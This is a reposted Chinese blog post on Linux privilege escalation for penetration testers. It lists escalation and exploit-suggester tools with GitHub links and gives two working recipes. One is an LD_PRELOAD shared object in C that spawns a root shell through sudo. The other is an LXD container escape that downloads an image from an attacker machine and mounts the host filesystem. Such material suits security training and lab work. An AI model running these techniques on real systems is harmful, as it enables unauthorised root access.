欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 科技 > IT业 > WEB渗透Linux提权篇-提权工具合集

WEB渗透Linux提权篇-提权工具合集

2025/4/19 13:12:13 来源:https://blog.csdn.net/qq_59468567/article/details/141815263  浏览:    关键词:WEB渗透Linux提权篇-提权工具合集

 往期文章

WEB渗透Linux提权篇-环境变量提权-CSDN博客

工具合集

工具名称下载地址工具描述
BadPotatohttps://github.com/BeichenDream/BadPotatoWindows 权限提升 BadPotato
Databasetoolshttps://github.com/Hel10-Web/Databasetools一款用Go语言编写的数据库自动化提权工具,支持Mysql、MSSQL、Postgresql、Oracle、Redis
traitorhttps://github.com/liamg/traitorLinux自动提权
hacking8https://i.hacking8.com/tiquan/在线提权建议
PEASS-nghttps://github.com/carlospolop/PEASS-ngPEASS-权限提升令人敬畏的脚本套件
kernelpophttps://github.com/spencerdodd/kernelpopkernel privilege escalation enumeration and exploitation framework
Kernelhubhttps://github.com/Ascotbe/Kernelhubinux、macOS、Windows 内核提权漏洞集合,带编译环境、demo GIF 地图、漏洞详情、可执行文件(提权漏洞合集)
linux-exploit-suggesterhttps://github.com/The-Z-Labs/linux-exploit-suggesterLinux privilege escalation auditing tool
UACMEhttps://github.com/hfiref0x/UACME通过滥用内置的 Windows AutoElevate 后门来击败 Windows 用户帐户控制。 x86-32/x64 Windows 7/8/8.1/10/11(客户端,但某些方法也适用于服务器版本)
LinuxTQhttps://github.com/Getshell/LinuxTQLinux提权方法论
Linux-Exploit-Suggesterhttps://github.com/mzet-/linux-exploit-suggester将目标补丁级别与 Linux 漏洞进行比较 数据库,以检测目标上可能缺失的补丁
linux-kernel-exploitshttps://github.com/SecWiki/linux-kernel-exploitsLinux提权集合
windows提权集合https://github.com/SecWiki/windows-kernel-exploitswindows-kernel-exploits Windows平台提权漏洞集合
win-exp-suggesterhttps://github.com/klsfct/getshell/tree/master/win-exp-suggester将目标补丁级别与 Microsoft 漏洞进行比较 数据库,以检测目标上可能缺失的补丁
CoercedPotatohttps://github.com/hackvens/CoercedPotato通过在Windows 10、Windows 11和Server 2022上滥用SeImpersonatePrivilege特权可以从LOCAL/NETWORK SERVICE提升为SYSTEM。
dll_hijackhttps://github.com/JKme/sb_kiddie-/tree/master/hacking_win/dll_hijackdll劫持工具

 windows、Linux、Mac提权脚本整理:夸克网盘分享

 

一些检测工具

用于检查可执行文件属性的 bash 脚本(如 PIE、RELRO、PaX、Canaries、ASLR、Fortify Source)

https://github.com/slimm609/checksec.sh

枚举基本系统信息并搜索常见的权限提升向量,例如世界可写文件、错误配置、明文密码和适用的漏洞利用

http://www.securitysift.com/download/linuxprivchecker.py

检查文件权限、cron 作业(如果可见)、弱凭据等

https://github.com/rebootuser/LinEnum

提权脚本

https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

枚举工具

https://github.com/diego-treitos/linux-smart-enumeration
https://github.com/AlessandroZ/BeRoot
https://github.com/pentestmonkey/unix-privesc-check

Linux-Exploit-Suggester

https://github.com/mzet-/linux-exploit-suggester
https://github.com/PenturaLabs/Linux_Exploit_Suggester
https://github.com/jondonas/linux-exploit-suggester-2
https://github.com/belane/linux-soft-exploit-suggester

LD_Preload提权

  #include <stdio.h>#include <sys/types.h>#include <stdlib.h>void _init() {unsetenv("LD_PRELOAD");setgid(0);setuid(0);system("/bin/sh");}
>gcc -fPIC -shared -o shell.so shell.c -nostartfiles
>ls -al shell.so
>sudo LD_PRELOAD=/tmp/shell.so find
>id

Lxd提权

查看文件是否存在

>which lxd & >which lxc

攻击机

>git clone https://github.com/saghul/lxd-alpine-builder.git
>cd lxd-alpine-builder
>./build-alpine

搞个web服务提供下载

>python -m SimpleHTTPServer

靶机下载

>wget http://192.168.1.107:8000/apline-v3.10-x86_64-20191008_1227.tar.gz
>lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
>lxc image list
>lxc init myimage ignite -c security.privileged=true
>lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
>lxc start ignite
>lxc exec ignite /bin/sh
>id

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词